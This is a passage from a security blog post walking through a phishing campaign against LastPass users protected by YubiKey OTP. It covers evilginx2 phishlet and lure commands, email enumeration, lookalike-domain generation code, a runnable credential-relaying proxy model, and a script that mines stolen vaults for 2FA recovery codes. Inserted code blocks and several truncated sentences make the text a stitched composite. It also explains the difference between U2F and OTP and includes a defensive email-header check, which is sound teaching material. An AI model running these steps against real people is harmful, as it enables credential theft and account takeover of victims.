This is a medium-sized extract from a longer blog post of mine. I go a little more in-depth on the difference between U2F and OTP and on how LastPass decrypts your vault in the full blog post.
(Un)fortunately, this is NOT a MITM attack on U2F. LastPass doesn’t support U2F, so this is disappointingly simple. It uses Yubico OTP, which we know to be phishable.
In this article, I show mainly how to deploy a phishing attack on LastPass users, even when they are protected with Yubikey physical keys. This is to remind people that YubiKey is not necessarily U2F.
Use security keys to prevent phishing
In recent years, phishing has proven to be one of the most effective ways of hacking people. Instead of using a fancy new exploit to steal a victim’s credentials, the hacker just asks the victims to hand their credentials over.
How do we combat this? One answer is “use security keys!”
“We have had no reported or confirmed account takeovers since implementing security keys at Google” 
In a phishing attack, the weak point is the human user. Security keys and protocols such as U2F take part of the burden of telling fake sites from real ones off the user: the key signs a challenge bound to the origin the browser is actually talking to, so a lookalike domain cannot obtain a response that the real site will accept.
Below we see LastPass endorsing the use of YubiKeys. The diagram presents the YubiKey as more secure, easy to use, and not phishable.
With that said, I recently got myself some YubiKeys. To use this “Advanced Multi-factor Option” with LastPass, I needed a premium account. Being a long-time user of LastPass, I didn’t think twice and paid to upgrade to premium.
Within minutes, I felt shortchanged. It quickly became obvious that using a Yubikey did not make my LastPass vault any more secure against phishing.
Why? Lastpass’s integration with the YubiKey uses Yubico OTP and not U2F.
Is this important, and is U2F really THAT much more secure?
Let me show you why this is important.
How to deploy a phishing campaign
Let’s take a red team mindset to appreciate why phishing is so effective and how easy it is to fall for. We use a reverse proxy to perform a “man-in-the-middle” (MITM) attack: the proxy sits between the victim and the real site, relays every request and response, and records the credentials, including the one-time code, as they pass through. That is how it steals the credentials and bypasses two-factor authentication (2FA).
Here’s an overview of how a MITM attack works.
Of course, phishing using MITM applies to many other sites. What makes LastPass unique is that it is the only site that I personally use that is still vulnerable to MITM even when using a Yubikey.
Let’s say you have to target an individual or a company. You first collect a small set of email addresses by searching LinkedIn, GitHub, Twitter, blogs, and other OSINT sources.
Now with these target emails, you explore the options available for your attack. The LastPass vault is a gold mine of credentials, since one successful phish yields every credential stored in it. Let’s see if these emails belong to LastPass users.
Since the registration process checks whether an email address is already in use, we can use it to gather more intel: if the address is taken, its owner likely has a LastPass account.
If you want to enumerate a small list of potential targets, you can use this simple API, which returns ok/no.
For targeted attacks, this is an effective way to check whether a given person can be phished for their LastPass credentials. Broad, untargeted enumeration is less practical if the availability endpoint is rate limited.
Getting the right domain
Having a legitimate-looking domain makes it easier to trick the victim. There are many ways to get one: slight modifications of the spelling, a different TLD, or the genuine name nested under an unrelated domain. We chose
Here are other examples of possible phishing domains for LastPass.
All of these are affordable for a red team or an individual attacker.
I hope you realize that in cases such as this one, a domain like lastpass.com.es is as suspicious as
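An added example, not from the original post, of generating such candidates for one brand. The homoglyph table, TLD list and decoy labels are assumptions chosen for the demo, and the brand name is the only input. The second function is a simplified model of the password-manager check discussed further down: it fills only on an exact host match or a subdomain of it, so none of the generated names would trigger autofill for an entry saved under lastpass.com.

```python
# Assumptions for the demo: which characters are confusable, which TLDs are cheap and
# plausible, and which labels make a name look like a login portal.
HOMOGLYPHS = {"l": ["1", "i"], "a": ["4"], "s": ["5", "z"], "o": ["0"], "e": ["3"],
              "t": ["7"], "m": ["rn"], "w": ["vv"]}
OTHER_TLDS = ["net", "org", "co", "io", "app", "es", "de", "uk"]
DECOY_LABELS = ["login", "secure", "account", "vault"]


def lookalike_domains(brand, legit_tld="com", tlds=OTHER_TLDS, homoglyphs=HOMOGLYPHS):
    """Candidate phishing domains for one brand: other TLDs, the genuine name nested
    under another TLD (lastpass.com.es), typos, homoglyphs and decoy labels."""
    base = f"{brand}.{legit_tld}"
    out = set()
    for tld in tlds:
        out.add(f"{brand}.{tld}")      # lastpass.es
        out.add(f"{base}.{tld}")       # lastpass.com.es: "lastpass.com" is just a label here
    for i, ch in enumerate(brand):
        out.add(f"{brand[:i]}{brand[i + 1:]}.{legit_tld}")   # omission:  lastpas.com
        out.add(f"{brand[:i]}{ch}{brand[i:]}.{legit_tld}")   # doubling:  lasttpass.com
        if i + 1 < len(brand):                               # swap:      alstpass.com
            out.add(f"{brand[:i]}{brand[i + 1]}{ch}{brand[i + 2:]}.{legit_tld}")
        for sub in homoglyphs.get(ch, []):                   # homoglyph: 1astpass.com
            out.add(f"{brand[:i]}{sub}{brand[i + 1:]}.{legit_tld}")
    for label in DECOY_LABELS:
        out.add(f"{brand}-{label}.{legit_tld}")              # lastpass-login.com
        out.add(f"{label}-{brand}.{legit_tld}")              # login-lastpass.com
    out.discard(base)  # identical-letter swaps can reproduce the real name
    return sorted(out)


def autofill_would_trigger(saved_host, current_host):
    """Simplified model of the browser extension's decision: fill only when the page's
    host is the saved host or a subdomain of it. How the page looks plays no part."""
    saved = saved_host.lower().rstrip(".")
    cur = current_host.lower().rstrip(".")
    return cur == saved or cur.endswith("." + saved)


if __name__ == "__main__":
    for d in lookalike_domains("lastpass"):
        print(d, "autofill:", autofill_would_trigger("lastpass.com", d))
```

Run against a real brand, the list is what you feed to a registrar lookup and, on the defensive side, to a certificate-transparency or passive-DNS watch so you learn when one of them goes live.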
Setting up the servers
To set up our phishing site, I’ve prepared a fork of evilginx2, which has some additional logic to steal the credentials from LastPass.
This is a Go application, so you need to install Go and run the following commands:
It is surprising how mature phishing tooling has become. Developing this fork took only about a day, and it is just as easy to set up a phishing site for your bank or company website, complete with a domain and a TLS certificate.
You can host this on your favorite cloud provider. After building the evilginx2 binary, run it and configure the LastPass phishlet:
# sudo ./bin/evilginx -p ./phishlets/ -developer
> config ip 127.0.0.1
> config domain lastpass.com.es
> phishlets hostname lastpass lastpass.com.es
> phishlets enable lastpass
Then create the lure, the link you bait the victim with. The redirect_url is the page the victim ends up on once you have all the necessary credentials:
> lures create lastpass
> lures edit redirect_url 0 https://www.youtube.com/watch?v=dQw4w9WgXcQ
> lures get-url 0
In our case, we want our victim to go
Note: these instructions are for testing locally. For this to work locally you might need to add the following to
Sending the Phishing Email
With the phishlet in place, the next step is the phishing email. This is where most of the work goes: you have to somehow get the user to click, and crafting a convincing phishing email is an art.
In this case, the email claims that we have revoked all trusted devices, so that the victim is hopefully not surprised when alerts about new logins arrive.
Waiting for the credentials
When the victim clicks the link, they land on the fake LastPass login, which the proxy serves from the real site.
When LastPass requires 2FA, the proxy relays that prompt too; the victim presses the YubiKey, and the resulting Yubico OTP is forwarded to the real LastPass, where it is consumed like any legitimate login.
As previous work has noted, the victim will likely also have to verify the new login by email because the activity comes from an unrecognized location. This looks less suspicious if we have already primed the victim to expect it by claiming we’ve “revoked trusted devices”.
Once the session is trusted, the victim’s browser downloads the encrypted vault through the proxy, which records it along with the victim’s username and password.
Afterward, the victim is redirected to the redirect_url configured on the lure.
Meanwhile, we have everything we need to recover all of the victim’s credentials.
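The whole exchange above, reduced to a runnable model: the code below is an added example written for this extract, not part of the original post or of evilginx2. It stands up a constructed fake of the real login endpoint (real.example, which accepts each OTP once and then hands out a session cookie and an “encrypted vault” blob), a minimal reverse proxy in the evilginx2 style on the phish host, and a victim that submits username, password and a constructed Yubico OTP through the proxy. All hostnames, paths, cookie names and the OTP value are assumptions for the demo.

```python
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

REAL_HOST = "real.example"      # stand-in for the legitimate site (constructed)
PHISH_HOST = "lastpass.com.es"  # the lookalike domain the victim was lured to
USED_OTPS = set()               # the real site accepts each Yubico OTP exactly once
CAPTURED = []                   # everything the proxy harvests, in order


class RealSiteHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the real login endpoint: checks the OTP is fresh,
    then issues a session cookie and returns the (fake) encrypted vault."""

    def do_POST(self):
        form = urllib.parse.parse_qs(self.rfile.read(int(self.headers["Content-Length"])).decode())
        otp = form.get("otp", [""])[0]
        if not otp or otp in USED_OTPS:          # replaying a consumed OTP fails
            self.send_response(401)
            self.send_header("Content-Length", "0")
            self.end_headers()
            return
        USED_OTPS.add(otp)
        body = b"encrypted-vault-of-" + form["username"][0].encode()
        self.send_response(200)
        self.send_header("Set-Cookie", f"PHPSESSID=s-{otp[-4:]}; Domain={REAL_HOST}; Secure")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def post_form(url, fields):
    """POST a form and return (status, body, Set-Cookie headers); a 4xx is returned, not raised."""
    req = urllib.request.Request(url, data=urllib.parse.urlencode(fields).encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.read(), resp.headers.get_all("Set-Cookie") or []
    except urllib.error.HTTPError as e:
        return e.code, e.read(), []


def make_proxy(upstream):
    """Reverse proxy in the evilginx2 style: the victim talks to it, it talks to the
    real site in real time, and everything in between is recorded."""
    class Proxy(BaseHTTPRequestHandler):
        def do_POST(self):
            raw = self.rfile.read(int(self.headers["Content-Length"])).decode()
            fields = {k: v[0] for k, v in urllib.parse.parse_qs(raw).items()}
            status, body, cookies = post_form(upstream + self.path, fields)  # OTP relayed live
            CAPTURED.append({**fields, "session_cookie": [c.split(";")[0] for c in cookies],
                             "vault": body})
            self.send_response(status)
            for c in cookies:
                # re-scope the cookie so the victim's browser keeps sending it to the phish host
                self.send_header("Set-Cookie", c.replace(f"Domain={REAL_HOST}", f"Domain={PHISH_HOST}"))
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, *args):
            pass
    return Proxy


def serve(handler):
    srv = ThreadingHTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


def run_demo():
    """Victim logs in through the proxy with username, password and a fresh OTP."""
    real, real_url = serve(RealSiteHandler)
    proxy, proxy_url = serve(make_proxy(real_url))
    try:
        victim = {"username": "victim@example.com", "password": "hunter2",
                  "otp": "cccccbtvhgrjchkdvlcdrtbugrkebjubbdinndhghbnt"}  # constructed OTP
        status, body, _ = post_form(proxy_url + "/login.php", victim)
        loot = CAPTURED[-1]
        # Replaying the stolen OTP later is useless: the live relay already consumed it.
        replay_status, _, _ = post_form(real_url + "/login.php", victim)
        return {"victim_saw": (status, body), "attacker_got": loot, "otp_replay_status": replay_status}
    finally:
        real.shutdown()
        proxy.shutdown()


if __name__ == "__main__":
    print(run_demo())
```

The interesting part is the last step: replaying the captured OTP gets a 401, because the real site already consumed it. The OTP is genuinely one-time; what it is not is bound to the site the user is looking at, so relaying it in real time is enough, and the loot that matters is the session cookie and the vault rather than the code itself.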
Decrypting the vault
To decrypt the LastPass Vault, you would need 3 main ingredients:
- LastPass Username
- LastPass Password
- Encrypted Vault
With the MITM proxy, we capture the victim’s username and password, and once the session is trusted after the YubiKey OTP has been relayed, we also capture the encrypted vault as it is downloaded.
evilginx2 was originally intended to hijack the session by capturing its cookies. I’ve found that it is easier to just dump the credentials from the vault, although in theory the proxy captures everything needed to take over the account as well.
In the project, I’ve provided a script, scripts/lastpass-python/dump_lastpass.py, which parses the evilginx2 DB and decrypts the credentials. The location of the DB depends on where the config file is. In my case it was
This creates two files: one with the credentials of the LastPass accounts themselves, and one with the credentials found in the vaults. Everything in the vault is there: the name, folder, username, password, URL, and secure notes associated with each item.
From here you can try to take over as many of the accounts as you can. To maximize impact, write a script that automatically checks the notes for 2FA recovery codes: with a password and its matching recovery codes, the second factor on that account is no longer an obstacle.
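An added example of that script, not from the project, operating on a constructed sample of the vault dump with the fields listed above (name, folder, username, password, url, notes). The code patterns and keywords are assumptions about how services usually format recovery codes; tune them to what you actually see.

```python
import re

# Constructed sample of the vault dump: one dict per item with the dump's fields
# (name, folder, username, password, url, notes). Not real data.
SAMPLE_VAULT = [
    {"name": "GitHub", "folder": "Dev", "username": "alice", "password": "correct horse",
     "url": "https://github.com/login",
     "notes": "Recovery codes:\nab12cd-34ef56\n78gh90-ij12kl\nmn34op-qr56st"},
    {"name": "Bank", "folder": "Finance", "username": "alice", "password": "x",
     "url": "https://bank.example", "notes": "Branch phone 555-0100, account ends 4421"},
    {"name": "AWS root", "folder": "Cloud", "username": "root@example.com", "password": "y",
     "url": "https://console.aws.amazon.com",
     "notes": "backup codes 12345678 23456789 34567890 45678901 56789012"},
    {"name": "Wiki", "folder": "", "username": "alice", "password": "z",
     "url": "https://wiki.example", "notes": "TOTP secret: JBSWY3DPEHPK3PXP"},
]

# Assumed shapes: a keyword most services print above the list, two common code formats
# (hyphenated alphanumeric groups, or 8-10 plain digits), and a base32 TOTP seed.
KEYWORDS = re.compile(r"\b(?:recovery|backup|scratch)\s+codes?\b", re.I)
CODE = re.compile(r"\b(?:[a-z0-9]{4,6}-[a-z0-9]{4,6}|\d{8,10})\b", re.I)
TOTP_SEED = re.compile(r"\b[A-Z2-7]{16,}\b")


def find_second_factor_material(items):
    """Items whose notes carry recovery codes or a TOTP seed, strongest finding first."""
    hits = []
    for item in items:
        notes = item.get("notes") or ""
        codes = CODE.findall(notes)
        has_keyword = KEYWORDS.search(notes) is not None
        has_seed = TOTP_SEED.search(notes) is not None
        # A seed, or a keyword with at least one code, or three code-shaped tokens on their own.
        if has_seed or (has_keyword and codes) or len(codes) >= 3:
            hits.append({"name": item["name"], "url": item["url"], "username": item["username"],
                         "keyword": has_keyword, "codes": codes, "totp_seed": has_seed})
    # A seed regenerates codes forever, so it outranks a finite list of codes.
    return sorted(hits, key=lambda h: (h["totp_seed"], h["keyword"], len(h["codes"])), reverse=True)


if __name__ == "__main__":
    for hit in find_second_factor_material(SAMPLE_VAULT):
        print(hit["name"], hit["url"], hit["codes"] or "TOTP seed")
```

For defenders the lesson is the inverse: recovery codes and TOTP seeds stored next to the password they protect collapse two factors into one, and a single vault phish takes both.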
Quick Notes on Phishing
Again, this problem is not specific to LastPass. You can be phished on almost any site you use, and some of them have fewer protections than LastPass. However, among the major password managers, I think LastPass is the only one that still doesn’t support U2F.
How do we detect a phishing email?
It is trivial for an attacker to copy the design of a legitimate email. In our example, you might be able to detect it from the sender’s domain, although even the From domain can be spoofed when the real domain’s SPF, DKIM and DMARC records are not configured properly.
Aside from the domain, the content itself is the only thing that looks fishy.
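An added example (not from the original post) of the check a mail filter or an analyst would run on the headers. The three messages are constructed, the allowlist of expected sender domains is an assumption, and the Authentication-Results header is read as written by the receiving MX (mx.example).

```python
import email
import email.utils

# Three constructed messages (not real mail), shown as the receiving MX (mx.example)
# would deliver them, Authentication-Results header included.
LEGIT_MESSAGE = """\
Return-Path: <bounce@lastpass.com>
Authentication-Results: mx.example; spf=pass smtp.mailfrom=lastpass.com;
 dkim=pass header.d=lastpass.com; dmarc=pass header.from=lastpass.com
From: LastPass <noreply@lastpass.com>
To: victim@example.com
Subject: New device sign-in

A new device was used to sign in to your account.
"""

LOOKALIKE_MESSAGE = """\
Return-Path: <bounce@lastpass.com.es>
Authentication-Results: mx.example; spf=pass smtp.mailfrom=lastpass.com.es;
 dkim=pass header.d=lastpass.com.es; dmarc=pass header.from=lastpass.com.es
From: LastPass <noreply@lastpass.com.es>
To: victim@example.com
Subject: Trusted devices revoked

We have revoked all trusted devices. Please log in again.
"""

SPOOFED_MESSAGE = """\
Return-Path: <bounce@mail.attacker.example>
Authentication-Results: mx.example; spf=fail smtp.mailfrom=mail.attacker.example;
 dkim=none; dmarc=fail header.from=lastpass.com
From: LastPass <noreply@lastpass.com>
To: victim@example.com
Subject: Trusted devices revoked

We have revoked all trusted devices. Please log in again.
"""

EXPECTED_SENDERS = {"lastpass.com"}  # allowlist for this brand (assumption for the example)


def domain_of(header_value):
    """'LastPass <noreply@lastpass.com>' -> 'lastpass.com'."""
    return email.utils.parseaddr(header_value or "")[1].rpartition("@")[2].lower()


def parse_auth_results(value):
    """Reduce an Authentication-Results header to {method: result}; the first token is
    the authserv-id, each later clause starts with 'method=result'."""
    results = {}
    for clause in (value or "").split(";")[1:]:
        tokens = clause.split()
        if tokens and "=" in tokens[0]:
            method, _, result = tokens[0].partition("=")
            results[method.lower()] = result.lower()
    return results


def classify(raw):
    """legitimate / spoofed / lookalike / unrelated, from the From domain and the
    receiving MX's authentication verdicts."""
    msg = email.message_from_string(raw)
    from_domain = domain_of(msg.get("From"))
    auth = parse_auth_results(msg.get("Authentication-Results"))
    if from_domain in EXPECTED_SENDERS:
        # Exact brand domain: DMARC is the test. A fail means someone else sent it.
        verdict = "legitimate" if auth.get("dmarc") == "pass" else "spoofed"
    elif any(s.split(".")[0] in from_domain for s in EXPECTED_SENDERS):
        # Brand name present but not the brand's domain: authenticates fine, still a phish.
        verdict = "lookalike"
    else:
        verdict = "unrelated"
    return {"from_domain": from_domain, "auth": auth, "verdict": verdict}


if __name__ == "__main__":
    for name, raw in [("legit", LEGIT_MESSAGE), ("lookalike", LOOKALIKE_MESSAGE), ("spoofed", SPOOFED_MESSAGE)]:
        print(name, classify(raw))
```

The point of the lookalike case: SPF, DKIM and DMARC all pass, because the attacker controls lastpass.com.es and set it up properly. Authentication only tells you the mail really came from the domain in From; the allowlist is what tells you whether that domain is the right one. The exact spoof of lastpass.com is the case DMARC catches, provided the real domain publishes a reject policy and your MX enforces it.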
As for the phishing website itself: gone are the days when phishing websites lacked TLS certificates. The only thing that gives it away is the domain. Because of the MITM proxy, what the victim sees is the real site relayed live, so there are no visual differences and it is practically undetectable in the short term.
What are some ways you can protect yourself at this point?
If you use your password manager’s browser extension, it will not offer the password, because it doesn’t recognize the domain.
The password manager looks solely at the domain of the site and doesn’t care whether the page looks like Facebook, Twitter, GitHub, or Google. For example, github.com is not the same as giithub.com, so if you are at giithub.com the password manager has no credentials to give you.
The special case is the password manager itself! It is one of the only sites where I type my password in manually, so it is still a prime target for phishing.
How can this happen?
“I thought if we use security keys we can prevent phishing?”
That is only true when using U2F or another origin-bound challenge-response protocol. A Yubico OTP, by contrast, is simply a one-time code the key types out when pressed; whoever receives it, a proxy included, can pass it straight on to the real site. Unfortunately, as we’ve previously mentioned, LastPass’s integration with the YubiKey uses Yubico OTP.
The difference between Yubico OTP and U2F is subtle, and the user experience of each is deceptively similar.
You are given a prompt, you insert your Yubikey, and you press the button. Now you’re in!
YubiKey ≠ U2F
Why did I think that LastPass uses U2F? I think it boils down to naively equating YubiKeys with security keys. But as I have learned, just because I’m using a YubiKey doesn’t mean it’s U2F.
It doesn’t help that there were pages like this.
The diagram suggests that using Yubikeys with Lastpass makes you less “phishable” and more secure, which is only true when using U2F.
If we update the page to be more accurate, it should look something like this:
Distinguishing between U2F and Yubico OTP makes it clear that the OTP is phishable, which is what we just demonstrated.
Here is another page which misled me:
Technically, this is true when using U2F. But considering that LastPass doesn’t support security keys, I think that statement is misplaced.
In the article below, it didn’t mention explicitly that LastPass supports U2F, but the association is.
It was surprising to find out that LastPass didn’t support U2F.
“If there’s one area where you’d expect U2F technology to be encouraged, it’s among password managers.” 
But in the end, it was just really stupid of me to pay for a premium account without double-checking what exactly I am paying for. Also, there are no refunds.
For those more experienced, this may have all been really obvious to you, but for the others, I hope you can learn from my experience. Simply looking at a table like this is misleading.
“Hardware token” can refer to both OTP and U2F. You have to check specifically whether it is U2F (or a comparable origin-bound protocol).
Moving out of LastPass
Less than 24 hours after paying for a LastPass premium account, I’m moving out.
Given the current lack of U2F support, the lack of concrete plans to support U2F, and the sketchy plaintext URLs, I’m done with LastPass. I don’t know why I have stayed with it for so long.
Now that I really think about it, my ideal password manager should have the following properties:
- supports U2F for multifactor authentication to prevent phishing
- open-source and third-party audited
- self-hostable on my own servers
I’m currently looking into Bitwarden. Maybe self-hosted. If you have suggestions or comments on what password manager to use, I’d appreciate it.
If you want more details on the differences between U2F and OTP and on how LastPass decrypts your vault, check out the full blog post.
U2F and Security Keys
How LastPass decrypts your vault
Krebs on Security, “Google: Security Keys Neutralized Employee Phishing” (2018)
LastPass Help, “Use YubiKey Multifactor Authentication”
Krebs on Security, “Phishers Are Upping Their Game. So Should You.”
John Leyden, PortSwigger The Daily Swig, “U2F nowhere near ready for prime time”
Josie Colt, Wired, “Simplify and Secure Your Online Logins With a YubiKey”
ZDNet, “Best security keys in 2020”